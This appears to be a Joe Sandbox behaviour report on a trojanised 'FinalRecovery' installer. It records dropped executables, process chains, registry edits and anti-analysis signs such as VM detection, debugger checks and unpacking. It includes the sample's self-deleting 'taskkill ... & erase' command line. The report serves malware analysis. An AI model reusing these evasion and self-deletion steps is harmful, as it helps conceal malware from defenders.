              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 00403400 appears 60 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 00406AA4 appears 39 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 0044540C appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 004456DC appears 59 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 004526A4 appears 91 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 00433B14 appears 32 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 00456D64 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 004078D4 appears 43 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 00456B58 appears 93 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 00403494 appears 83 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 00408BEC appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: String function: 00403684 appears 218 times
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0042F178 NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00423B6C NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004563D8 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004125C0 NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004771E0 NtdllDefWindowProc_A,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0042E780: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,
              Source: file.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
              Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
              Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: file.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
              Source: is-U89TP.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: is-U89TP.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
              Source: is-U89TP.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
              Source: is-U89TP.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: is-U89TP.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
              Source: file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
              Source: file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy) 233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
              Source: finalrecovery.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpProcess created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpProcess created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;finalrecovery.exe&quot;)
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmpJump to behavior
              Source: classification engineClassification label: mal92.troj.evad.winEXE@12/24@0/4
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00401B40 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00455028 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_01
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409BC4 FindResourceA,SizeofResource,LoadResource,LockResource,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFRJump to behavior
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCommand line argument: `a}{
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCommand line argument: MFE.
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCommand line argument: ZK]Z
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCommand line argument: ZK]Z
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpWindow found: window name: TMainForm
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1782938 > 1048576

              Data Obfuscation

              barindex
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeUnpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeUnpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.fga20:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406590 push 004065CDh; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004080DC push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004040B5 push eax; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404185 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404206 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C218 push eax; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004042E8 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404283 push 00404391h; ret
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00408F10 push 00408F43h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0040992C push 00409969h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0040A027 push ds; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00476228 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0045866C push 004586B0h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004106B8 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0040A77C push C00040C3h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00412910 push 00412973h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00442A78 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00450B58 push 00450B8Bh; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00450D1C push ecx; mov dword ptr [esp], eax
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00456E00 push 00456E38h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00492EC8 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0040D010 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0045F0C0 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0040546D push eax; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0040F570 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00483538 push ecx; mov dword ptr [esp], ecx
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0040553D push 00405749h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004055BE push 00405749h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0040563B push 00405749h; ret
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004056A0 push 00405749h; ret
              Source: finalrecovery.exe.1.drStatic PE information: section name: .fga20
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: initial sampleStatic PE information: section name: .text entropy: 7.328115312515883
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)Jump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpJump to dropped file
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeFile created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpFile created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-U89TP.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_iscrypt.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0042417C IsIconic,SetActiveWindow,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004241C4 IsIconic,SetActiveWindow,SetFocus,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0041836C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00422844 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00417580 IsIconic,GetCapture,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00481878 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00417CB6 IsIconic,SetWindowPos,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00417CB8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodes
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpDropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpDropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpDropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpDropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-U89TP.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dllJump to dropped file
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B08 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00451DC0 FindFirstFileA,GetLastError,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00423DAD FindFirstFileExW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10007E39 FindFirstFileExW,
              Source: finalrecovery.exe, 00000002.00000002.323596544.000000000168A000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,
              Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
